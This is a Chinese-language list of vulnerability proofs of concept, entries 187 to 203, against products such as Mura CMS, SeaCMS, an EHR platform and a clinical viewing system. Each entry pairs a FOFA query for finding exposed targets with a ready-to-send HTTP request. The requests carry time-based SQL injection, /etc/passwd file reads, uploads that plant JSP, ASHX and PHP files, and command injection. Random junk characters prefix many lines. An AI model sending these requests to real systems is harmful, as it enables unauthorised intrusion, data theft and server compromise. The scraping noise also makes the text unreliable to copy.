4 ~  z; `' ]8 k( x  C7 g  GFOFA："Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
" V* P- e: o; e  fHost: your-ip
Content-Type: application/x-www-form-urlencoded


3 c2 @" f3 j. ~  [object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

& ^$ a2 Q  Z1 w1 ]; b
+ @- ?3 r- R# Y+ o" N" e3 `/ r188. 叁体-佳会视频会议 attachment 任意文件读取
version <= 3.9.7
8 E3 }# f) m, t, g- l. s) DFOFA：body="/system/get_rtc_user_defined_info?site_id"
  U; G1 y( W% x3 f1 PGET /attachment?file=/etc/passwd HTTP/1.1
5 B8 U# J- o6 i0 ^. ?1 rHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 r2 I* f- g( N1 q0 L: q+ dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 ^" Z! n# \5 j4 KAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

& x2 f1 J& ^. Z, J" P
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
& ~+ {2 S8 ]* ~! j- GFOFA：app="LANWON-临床浏览系统"
% p0 D, _, ~% J/ T% L' A' UGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
5 {+ ?: X; L+ k, [9 Q7 kHost: your-ip
4 A- r. l1 e3 Y) S$ U9 lUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
$ U  ?* D. B+ b. O8 `; P# {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ O: o0 n! |* }+ [8 \Accept-Encoding: gzip, deflate
" I# J. y' O8 S* Y1 k% LAccept-Language: zh-CN,zh;q=0.9
" I$ |" @3 z0 _' HConnection: close
& U) b; `. J9 x5 ]0 W  n+ G
( j, R) e2 }$ `7 Z& A5 F' b/ n2 H
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
FOFA：title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
) ^5 a/ y/ J9 ^0 j4 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ X/ Q! g# [$ @Content-Type: application/x-www-form-urlencoded
& Z) h3 @. t+ CAccept-Encoding: gzip, deflate
# E0 Q- K, Q$ J+ |  Y/ b: v2 cAccept-Language: zh-CN,zh;q=0.9
# H8 O: E: t5 G0 J, g; A3 O
0 H: g: R8 g, k* _" d/ x. a0 Cpoi=file:///etc/passwd
* [% z& E7 J4 R( W$ v! M% \
, r" a# K, b+ \+ w
1 s( f' [. g2 f0 r( a4 k/ h191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
FOFA：body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
, p. X* g! J& E9 a" s
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

$ P) {; ^. i4 a4 p
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
8 [1 o+ r1 U3 m) Q; RFOFA：title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
" _6 f7 X5 Q' LHost: your-ip
4 g* p9 L% B0 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

; N# D# e* r9 H3 ^/ j" l0 q
<% @ webhandler language="C#" class="AverageHandler" %>
+ f- d2 c# W* ^- Dusing System;
3 E' C1 u. ?8 N6 o8 wusing System.Web;
6 E6 z- s* ^; B0 @, @. Jpublic class AverageHandler : IHttpHandler
3 \- [% ^# R2 |3 N{
8 ~! s+ k. o7 l* c  F* kpublic bool IsReusable
4 p* S5 F. l* X) Q6 N# C, U{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
* e+ l5 Q. O. e}
0 j+ ^% m4 f$ k}

6 x6 x. M* V* s) t' I
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
* r$ S$ S$ [/ _8 n) {3 S( iFOFA：body="山石云鉴主机安全管理系统"
9 w) {  @% V) }& {+ O( M- oGET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
. e( t4 A' \7 n. N8 l$ c$ w% mCookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
, Y/ B4 R2 z7 S( U( L% G3 H) D8 e

( d& y* ~" M9 s1 {POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
: W) P7 y- ?* B# V$ d1 QHost:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
  z: Y7 u- }7 |Cookie: PHPSESSID=2333333333333;
3 }  r( }7 A" A! o4 o4 wContent-Type: application/x-www-form-urlencoded
Content-Length: 84
- P% _5 w( b# t
% y  b9 e) `- ?+ E' J2 qparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
1 X! w+ Y" L: d& H5 W! [

7 [+ L' r) c. P5 SGET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0
3 q: ^( y8 U. a9 D. S2 U

: _" K# T; L; w& F) ]194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
FOFA：app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
( w5 T$ x3 {+ V9 p2 N! Z. tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  {2 w1 i0 y, z! s$ c. _; N* u3 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
  o3 R) I) `) B& B1 \* hConnection: close
8 u) j! M% T& l  q/ m- Q- R! yContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
' a4 [4 y9 j% O- R------WebKitFormBoundaryKNt0t4vBe8cX9rZk

Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
2 [+ [$ E* ^5 P( l! f+ _* D6 T9 DContent-Type: text/plain
<% out.println("hello");%>
( _" e& o) p# {+ n------WebKitFormBoundaryKNt0t4vBe8cX9rZk
9 L  P" Q2 r+ U' h  b' CContent-Disposition: form-data; name="json"
{"iq":{"query":{"UpdateType":"mail"}}}
1 K8 A' n4 p1 z1 o" Q------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

0 h& B5 g0 @9 T9 N4 h3 q7 O3 B
0 E. ~. u1 R, d4 \, h195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
: C" s% e9 Y9 b6 `# @( oFOFA：title=="飞鱼星企业级智能上网行为管理系统
8 z1 Y# C# X1 }4 ZPOST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
. l2 R4 V% H/ z3 J/ lAccept: */*
Accept-Encoding: gzip, deflate
/ r, D6 i/ `: t( ~Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
! j4 Q1 W1 Q& ]  AContent-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

: ^( w9 @& @7 `! l% t# d7 g
196. 河南省风速科技统一认证平台密码重置
FOFA：body="/cas/themes/zbvc/js/jquery.min.js"
5 y, y5 d8 |" APOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
0 \  T6 c& O$ L% IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. ~5 G8 @: b6 W( ?Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
* l; S9 h0 |/ u8 kAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
" w/ N: L+ M' p2 t7 D! B& L1 tContent-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}



197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
+ J0 t0 ]1 W! _8 T8 f1 bFOFA：app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
6 d# I* {/ v' Q. ~" F  V2 lHost:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
" K$ L% q5 }* gAccept-Encoding: gzip, deflate
3 W/ p8 P- t" ?Connection: close
' [* ^6 C+ _% }9 X
1 A+ c" {# B- p7 X4 J% {
# ]0 d/ X. I5 M+ r
8 g! d; L; x! r" V3 H198.  阿里云盘 WebDAV 命令注入
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
& Q3 s" Q8 ]. l* X3 mCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
# ?6 q  y$ [- {) a2 jAccept-Encoding: gzip, deflate
3 c) c4 H6 t1 ]+ _  j( |Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
. D# M! N( e: ?2 ?Connection: close
! N- ~6 k2 Z/ y$ S
! j% b& C3 S; n+ N( s" q! b% {
199. cockpit系统assetsmanager_upload接口 文件上传
- _  n& o( I9 L2 \
* U; f# P- Q) i% r: k0 ^! U5 z- a1 i1.执行poc进行csrf信息获取，并获取cookie，再上传访问得到结果：
GET /auth/login?to=/ HTTP/1.1

, X* S# p; |/ u响应：200，返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2.使用刚才上一步获取到的jwt获取cookie：

POST /auth/check HTTP/1.1
Content-Type: application/json

  L: P. I# Q6 ^! I+ K9 d+ g$ s{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
' V. O; P/ {- `8 W0 ^/ ~
' K0 ~( R- V7 r- f: @- L' b/ P响应：200，返回值:
  a; z4 H# e: d6 N3 Q9 FSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
+ Z" `( w8 P7 J- |/ T4 j$ HFofa：title="Authenticate Please!"
( C9 c) j3 ?# d3 D( t' f% cPOST /assetsmanager/upload HTTP/1.1
9 V7 v0 x% o7 o2 z( K. EContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
6 y- @) a: |8 d* H0 eCookie: mysession=95524f01e238bf51bb60d77ede3bea92
: y8 u3 R; T5 k% e" p1 B. B
-----------------------------36D28FBc36bd6feE7Fb3
$ v& y+ g. R; |" W( X0 f6 kContent-Disposition: form-data; name="files[]"; filename="tttt.php"
$ `! f. y$ G$ E; L( r2 lContent-Type: text/php
/ ^! [* ?) x0 {0 X& @5 Q
1 i7 A3 n0 D  o- x<?php echo "tttt";unlink(__FILE__);?>
; m* \: o% a& q-----------------------------36D28FBc36bd6feE7Fb3
; a- L% |. i' ]4 F/ N3 @, wContent-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--
( E# V/ O# Q5 A% k+ X: c8 D5 i4 W

/storage/uploads/tttt.php

+ j  M% s/ i' x' |4 g200. SeaCMS海洋影视管理系统dmku SQL注入
FOFA：app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
8 f0 C* E5 i- p, e8 n; f" ~6 e! LCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
2 Z; H# k; Q9 G! L4 B) ?, yCache-Control: max-age=0
- C3 w' P& i2 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& c2 C0 N9 n! JAccept-Encoding: gzip, deflate
/ V- u3 y  f* y( F2 n+ ]Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 binary SQL注入
' W8 z$ w2 j% i' @4 M. RFOFA：body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
  E" c! c  A& S8 \+ N  i" u- |, _POST /newsedit/newsplan/task/binary.do HTTP/1.1
0 e2 X6 r. h" X/ Y, t* l* M6 YContent-Type: application/x-www-form-urlencoded
, h: b- w) y$ w, g' {7 b- xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
% @  m& W6 L/ g8 `Accept-Language: zh-CN,zh;q=0.9
Connection: close
/ @9 y! e/ t! U" g7 ~
: {6 v+ ]! z  L* S; t' k3 a% |TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

  u# j' a2 R' o1 d9 d- n& g, h" M5 S
202. 微擎系统 AccountEdit任意文件上传
FOFA：body="/Widgets/WidgetCollection/"
% e1 J6 X/ F* D. `* |* B+ k8 l获取__VIEWSTATE和__EVENTVALIDATION值
( p4 m$ ^) L+ w& [2 E0 q* tGET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0
) s% h# P4 @8 X% E

替换__VIEWSTATE和__EVENTVALIDATION值
8 W/ i9 w8 v; O3 lPOST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
' h4 H5 |; m) nContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

  V/ q* O& k0 h8 }5 h-----------------------------786435874t38587593865736587346567358735687
' s8 ?! C6 D6 U- C8 w) XContent-Disposition: form-data; name="__VIEWSTATE"
9 _& g) J1 Y3 S$ g# z
__VIEWSTATE
" S+ \# H; L, ?-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
# p/ Z/ l% X9 A" `9 h7 l( [. |8 {Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

3 J$ j0 c5 x$ {4 [, PHello World!
-----------------------------786435874t38587593865736587346567358735687
' V+ p, m, q* g; \5 S3 ^2 ^Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
. v) s4 D& y0 R2 |. h: J2 p, t1 @) [% r-----------------------------786435874t38587593865736587346567358735687
/ |# q% d  q$ k- }2 a! E  bContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( u. |" H8 X- a

-----------------------------786435874t38587593865736587346567358735687
7 a1 s9 t# o8 |5 d& }7 A* PContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

$ h- m/ y, Q& v4 |% X( p
) n2 G0 ~8 `" o/_data/Uploads/1123.txt

# D0 j/ F+ S/ L6 q; {203. 红海云EHR PtFjk 文件上传
FOFA：body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
- K' ?6 h, J" p* ?# K# lAccept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; X, v8 g6 s# ^* b0 I/ W  S" ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210
& K* D3 o( ^. a- z5 P/ y' K
------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

3 l, ~- n0 x7 i7 D<% out.print("hello,eHR");%>
' h( j0 U' W* ]* z------WebKitFormBoundaryt7WbDl1tXogoZys4--

& X% R$ d1 |: A- r! ]
  k% u$ c: h% p0 N% Z& g
, Y& z0 X9 M  l
3 S- _0 V" f5 y/ i7 E, f3 u6 q  S
) `5 u7 v, e9 _+ l) U
2 E5 S2 l# w4 e$ |7 G) b- ?$ y& j